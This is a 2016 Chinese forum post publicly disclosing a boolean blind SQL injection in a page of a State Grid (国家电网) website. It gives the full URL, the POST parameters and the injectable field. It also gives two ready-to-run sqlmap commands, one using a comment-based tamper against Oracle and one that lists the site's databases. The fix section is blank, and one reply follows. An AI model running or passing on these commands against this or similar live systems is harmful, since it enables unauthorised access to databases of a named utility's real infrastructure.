HanDs
管理员

[7月漏洞公开] 国家电网某网站存在sql注入漏洞 



详细说明:

http://www.cet.sgcc.com.cn/sites/zdzb/contentCritic.jsp

POST:ChildWebID=zdzb&currPage=1&pageSize=15

注入类型:布尔型盲注

漏洞证明:

code 区域
sqlmap.py -u "http://www.cet.sgcc.com.cn/sites/zdzb/contentCritic.jsp" --method POST --data "ChildWebID=zdzb&currPage=1&pageSize=15" -p ChildWebID --tamper=space2comment --dbms oracle



图片1.png



列个库

code 区域
sqlmap.py -u "http://www.cet.sgcc.com.cn/sites/zdzb/contentCritic.jsp" --method POST --data "ChildWebID=zdzb&currPage=1&pageSize=15" -p ChildWebID --tamper=space2comment --dbms oracle --dbs



QQ截图20160601145231.jpg



点到为止

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
国家
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:1
jjyyjjyy
天堂鸟LV23
66666666

2016-7-18 #2楼
游客组
快速回复